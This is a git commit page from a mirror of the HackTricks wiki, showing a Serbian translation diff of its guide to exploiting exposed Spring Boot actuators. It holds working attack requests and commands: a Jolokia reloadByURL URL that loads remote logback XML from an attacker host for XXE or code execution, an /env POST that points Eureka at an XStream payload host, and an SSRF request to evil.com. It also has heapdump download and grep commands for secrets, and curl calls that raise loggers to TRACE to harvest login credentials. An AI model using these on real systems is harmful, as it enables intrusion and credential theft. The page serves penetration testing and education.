maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['', 'src/linux-hardening/privilege-escalation/README.md', 's

Browse Source
This commit is contained in:
Translator 2025-09-03 16:55:25 +00:00
parent cfc903b89b
commit e8035d4a8c
2 changed files with 405 additions and 314 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

595
src/linux-hardening/privilege-escalation/README.md
View File

File diff suppressed because it is too large Load Diff

124
src/network-services-pentesting/pentesting-web/spring-actuators.md
View File

@ -1,4 +1,4 @@
# Spring Actuators
# Spring Actuatori
{{#include ../../banners/hacktricks-training.md}}
@ -6,30 +6,30 @@
<figure><img src="../../images/image (927).png" alt=""><figcaption></figcaption></figure>
**From** [**https://raw.githubusercontent.com/Mike-n1/tips/main/SpringAuthBypass.png**](https://raw.githubusercontent.com/Mike-n1/tips/main/SpringAuthBypass.png)
**Iz** [**https://raw.githubusercontent.com/Mike-n1/tips/main/SpringAuthBypass.png**](https://raw.githubusercontent.com/Mike-n1/tips/main/SpringAuthBypass.png)
## Exploiting Spring Boot Actuators
## Eksploatacija Spring Boot Actuatora
**Check the original post from** \[**https://www.veracode.com/blog/research/exploiting-spring-boot-actuators**]
**Pogledajte originalni post na** \[**https://www.veracode.com/blog/research/exploiting-spring-boot-actuators**]
### **Key Points:**
### **Ključne tačke:**
- Spring Boot Actuators registruju krajnje tačke kao što su `/health`, `/trace`, `/beans`, `/env`, itd. U verzijama od 1 do 1.4, ove krajnje tačke su dostupne bez autentifikacije. Od verzije 1.5 nadalje, samo su `/health` i `/info` po defaultu neosetljive, ali programeri često onemogućavaju ovu sigurnost.
- Određene Actuator krajnje tačke mogu izložiti osetljive podatke ili omogućiti štetne radnje:
- Spring Boot Actuatori registruju endpoint-e kao što su `/health`, `/trace`, `/beans`, `/env`, itd. U verzijama 1 do 1.4, ovi endpoint-i su dostupni bez autentifikacije. Od verzije 1.5 nadalje, podrazumevano su neosetljivi samo `/health` i `/info`, ali developeri često onemoguće ovu zaštitu.
- Određeni Actuator endpoint-i mogu izložiti osetljive podatke ili omogućiti štetne radnje:
- `/dump`, `/trace`, `/logfile`, `/shutdown`, `/mappings`, `/env`, `/actuator/env`, `/restart`, i `/heapdump`.
- U Spring Boot 1.x, aktuatore registruju pod korenskim URL-om, dok su u 2.x pod osnovnom putanjom `/actuator/`.
- U Spring Boot 1.x, actuatori su registrovani na root URL-u, dok su u 2.x pod `/actuator/` baznom putanjom.
### **Exploitation Techniques:**
### **Tehnike iskorišćavanja:**
1. **Remote Code Execution via '/jolokia'**:
- Krajnja tačka `/jolokia` izlaže Jolokia biblioteku, koja omogućava HTTP pristup MBeans.
- Akcija `reloadByURL` može se iskoristiti za ponovo učitavanje konfiguracija logovanja sa spoljnog URL-a, što može dovesti do slepog XXE ili daljinskog izvršavanja koda putem kreiranih XML konfiguracija.
- Primer URL-a za eksploataciju: `http://localhost:8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/artsploit.com!/logback.xml`.
- Endpoint `/jolokia` izlaže Jolokia Library, koja omogućava HTTP pristup MBeans.
- Akcija `reloadByURL` može se iskoristiti za ponovo učitavanje logging konfiguracija sa spoljnog URL-a, što može dovesti do blind XXE ili Remote Code Execution putem posebno crafted XML konfiguracija.
- Primer exploit URL-a: `http://localhost:8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/artsploit.com!/logback.xml`.
2. **Config Modification via '/env'**:
- Ako su prisutne Spring Cloud biblioteke, krajnja tačka `/env` omogućava modifikaciju svojstava okruženja.
- Svojstva se mogu manipulisati za eksploataciju ranjivosti, kao što je ranjivost deserializacije XStream u Eureka serviceURL.
- Primer POST zahteva za eksploataciju:
- Ako su prisutne Spring Cloud Libraries, endpoint `/env` omogućava izmenu env properties.
- Properties se mogu manipulisati da bi se iskoristile ranjivosti, kao što je XStream deserialization ranjivost u Eureka serviceURL.
- Primer exploit POST zahteva:
```
POST /env HTTP/1.1
@ -40,25 +40,101 @@ Content-Length: 65
eureka.client.serviceUrl.defaultZone=http://artsploit.com/n/xstream
```
3. **Other Useful Settings**:
- Svojstva kao što su `spring.datasource.tomcat.validationQuery`, `spring.datasource.tomcat.url`, i `spring.datasource.tomcat.max-active` mogu se manipulisati za razne eksploatacije, kao što su SQL injekcije ili menjanje stringova za povezivanje sa bazom podataka.
3. **Ostala korisna podešavanja:**
- Properties kao `spring.datasource.tomcat.validationQuery`, `spring.datasource.tomcat.url`, i `spring.datasource.tomcat.max-active` mogu se manipulisati za razne iskorišćavanja, kao što su SQL injection ili menjanje konekcijskih stringova baze podataka.
### **Additional Information:**
### **Dodatne informacije:**
- Sveobuhvatna lista podrazumevanih aktuatore može se naći [here](https://github.com/artsploit/SecLists/blob/master/Discovery/Web-Content/spring-boot.txt).
- Krajnja tačka `/env` u Spring Boot 2.x koristi JSON format za modifikaciju svojstava, ali opšti koncept ostaje isti.
- Kompletna lista podrazumevanih actuatora može se naći [ovde](https://github.com/artsploit/SecLists/blob/master/Discovery/Web-Content/spring-boot.txt).
- Endpoint `/env` u Spring Boot 2.x koristi JSON format za izmenu properties, ali opšti koncept ostaje isti.
### **Related Topics:**
### **Povezane teme:**
1. **Env + H2 RCE**:
- Detalji o eksploataciji kombinacije krajnje tačke `/env` i H2 baze podataka mogu se naći [here](https://spaceraccoon.dev/remote-code-execution-in-three-acts-chaining-exposed-actuators-and-h2-database).
- Detalji o iskorišćavanju kombinacije `/env` endpoint-a i H2 baze mogu se naći [ovde](https://spaceraccoon.dev/remote-code-execution-in-three-acts-chaining-exposed-actuators-and-h2-database).
2. **SSRF on Spring Boot Through Incorrect Pathname Interpretation**:
- Rukovanje matricnim parametrima (`;`) u HTTP putanjama od strane Spring framework-a može se iskoristiti za Server-Side Request Forgery (SSRF).
- Primer zahteva za eksploataciju:
- Rukovanje Spring framework-a matrix parametrima (`;`) u HTTP pathname-ovima može se iskoristiti za Server-Side Request Forgery (SSRF).
- Primer exploit zahteva:
```http
GET ;@evil.com/url HTTP/1.1
Host: target.com
Connection: close
```
## HeapDump - izvlačenje tajni (credentials, tokens, internal URLs)
Ako je `/actuator/heapdump` izložen, obično možete preuzeti kompletan JVM heap snapshot koji često sadrži žive tajne (DB creds, API keys, Basic-Auth, interne service URL-ove, Spring property mape, itd.).
- Preuzimanje i brza trijaža:
```bash
wget http://target/actuator/heapdump -O heapdump
# Quick wins: look for HTTP auth and JDBC
strings -a heapdump | grep -nE 'Authorization: Basic|jdbc:|password=|spring\.datasource|eureka\.client'
# Decode any Basic credentials you find
printf %s 'RXhhbXBsZUJhc2U2NEhlcmU=' | base64 -d
```
- Detaljnija analiza sa VisualVM i OQL:
- Otvorite heapdump u VisualVM-u, pregledajte instance `java.lang.String` ili pokrenite OQL da biste tražili tajne:
```
select s.toString()
from java.lang.String s
where /Authorization: Basic|jdbc:|password=|spring\.datasource|eureka\.client|OriginTrackedMapPropertySource/i.test(s.toString())
```
- Automatizovano izvlačenje sa JDumpSpider:
```bash
java -jar JDumpSpider-*.jar heapdump
```
Tipični nalazi visoke vrednosti:
- Spring `DataSourceProperties` / `HikariDataSource` objekti koji izlažu `url`, `username`, `password`.
- `OriginTrackedMapPropertySource` unosi koji otkrivaju `management.endpoints.web.exposure.include`, portove servisa i ugrađeni Basic-Auth u URL-ovima (npr. Eureka `defaultZone`).
- Obični HTTP request/response fragmenti uključujući `Authorization: Basic ...` snimljeni u memoriji.
Saveti:
- Koristite Spring-fokusiranu wordlistu da brzo otkrijete actuator endpoint-e (npr. SecLists spring-boot.txt) i uvek proverite da li su `/actuator/logfile`, `/actuator/httpexchanges`, `/actuator/env` i `/actuator/configprops` takođe izloženi.
- Kredencijali iz heapdump-a često rade za susedne servise, a ponekad i za sistemske korisnike (SSH), pa ih probajte široko.
## Abusing Actuator loggers/logging to capture credentials
Ako `management.endpoints.web.exposure.include` to dozvoljava i `/actuator/loggers` je izložen, možete dinamički povećati nivoe logovanja na DEBUG/TRACE za pakete koji obrađuju autentifikaciju i obradu zahteva. U kombinaciji sa čitljivim logovima (preko `/actuator/logfile` ili poznatih putanja za logove), ovo može leak-ovati kredencijale poslate tokom login tokova (npr. Basic-Auth zaglavlja ili form parametri).
- Izdenumerišite i pojačajte osetljive loggere:
```bash
# List available loggers
curl -s http://target/actuator/loggers | jq .
# Enable very verbose logs for security/web stacks (adjust as needed)
curl -s -X POST http://target/actuator/loggers/org.springframework.security \
-H 'Content-Type: application/json' -d '{"configuredLevel":"TRACE"}'
curl -s -X POST http://target/actuator/loggers/org.springframework.web \
-H 'Content-Type: application/json' -d '{"configuredLevel":"TRACE"}'
curl -s -X POST http://target/actuator/loggers/org.springframework.cloud.gateway \
-H 'Content-Type: application/json' -d '{"configuredLevel":"TRACE"}'
```
- Pronađite gde se logovi zapisuju i sakupljajte ih:
```bash
# If exposed, read from Actuator directly
curl -s http://target/actuator/logfile | strings | grep -nE 'Authorization:|username=|password='
# Otherwise, query env/config to locate file path
curl -s http://target/actuator/env | jq '.propertySources[].properties | to_entries[] | select(.key|test("^logging\\.(file|path)"))'
```
- Pokrenite login/autentikacioni saobraćaj i parsirajte log za kredencijale. U microservice okruženjima gde gateway stoji ispred auth-a, uključenje TRACE za gateway/security pakete često čini vidljivim zaglavlja i telo formi. Neka okruženja čak periodično generišu sintetički login saobraćaj, što čini sakupljanje trivijalnim kada je logovanje verbose.
Napomene:
- Vratite nivoe logovanja kada završite: `POST /actuator/loggers/<logger>` sa `{ "configuredLevel": null }`.
- Ako je `/actuator/httpexchanges` izložen, on takođe može izneti nedavnu metadata zahteva koja mogu uključivati osetljiva zaglavlja.
## References
- [Exploring Spring Boot Actuator Misconfigurations (Wiz)](https://www.wiz.io/blog/spring-boot-actuator-misconfigurations)
- [VisualVM](https://visualvm.github.io/)
- [JDumpSpider](https://github.com/whwlsfb/JDumpSpider)
- [0xdf HTB Eureka (Actuator heapdump to creds, Gateway logging abuse)](https://0xdf.gitlab.io/2025/08/30/htb-eureka.html)
{{#include ../../banners/hacktricks-training.md}}